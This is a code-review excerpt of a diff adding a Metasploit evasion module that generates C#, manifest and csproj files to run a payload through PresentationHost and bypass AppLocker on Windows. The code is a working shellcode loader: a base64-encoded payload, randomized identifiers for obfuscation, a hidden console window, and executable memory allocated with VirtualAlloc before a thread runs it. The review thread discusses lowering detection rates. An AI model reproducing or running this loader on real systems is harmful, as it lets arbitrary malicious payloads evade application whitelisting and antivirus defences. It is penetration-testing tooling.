modules/evasion/windows/applocker_evasion_presentationhost.rb

```diff
@@ -0,0 +1,167 @@
+      'Author'      =>
+        [
+          'Nick Tyrer <@NickTyrer>', # module development
+          'Casey Smith' # presentationhost bypass research
+        ],
+      'License'     => 'MSF_LICENSE',
+      'Platform'    => 'win',
+      'Arch'        => [ARCH_X86],
+      'Targets'     => [['Microsoft Windows', {}]])
+    )
+
+    register_options(
+      [
+        OptString.new('FILE_ONE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),
+        OptString.new('FILE_TWO', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),
+        OptString.new('FILE_THREE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])
+      ]
+    )
+
+    deregister_options('FILENAME')
+  end
+
+  def build_payload
+    Rex::Text.encode_base64(payload.encoded)
+  end
+
+  def obfu
+    Rex::Text.rand_text_alpha 8
+  end
+
+  def presentationhost_xaml_cs
+    esc = build_payload
+    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
+    <<~HEREDOC
+      using System;
+      class #{mod[0]}{
+      static void Main(string[] args){
+      IntPtr #{mod[1]};
+      #{mod[1]} = GetConsoleWindow();
+      ShowWindow(#{mod[1]}, #{mod[2]});
+      string #{mod[3]} = "#{esc}";
+      byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});
+      byte[] #{mod[5]} = #{mod[4]};
+      IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});
+      System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);
+      IntPtr #{mod[9]} = IntPtr.Zero;
+      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}
+      private static Int32 #{mod[7]}=0x1000;
+      private static IntPtr #{mod[8]}=(IntPtr)0x40;
+      private static UInt32 #{mod[10]} = 0xFFFFFFFF;
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
+      [System.Runtime.InteropServices.DllImport("user32.dll")]
+      static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);
+      [System.Runtime.InteropServices.DllImport("Kernel32")]
+      private static extern IntPtr GetConsoleWindow();
+      const int #{mod[2]} = 0;}
+    HEREDOC
+  end
+
+  def presentationhost_manifest
+    <<~HEREDOC
+      <?xml version="1.0" encoding="utf-8"?>
+      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
+      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />
```

Comment:
Should `name` be customizable? It could help with detection rates if it's not always `MyApplication`.

Reply:
MyApplication.app is the default application name VS uses.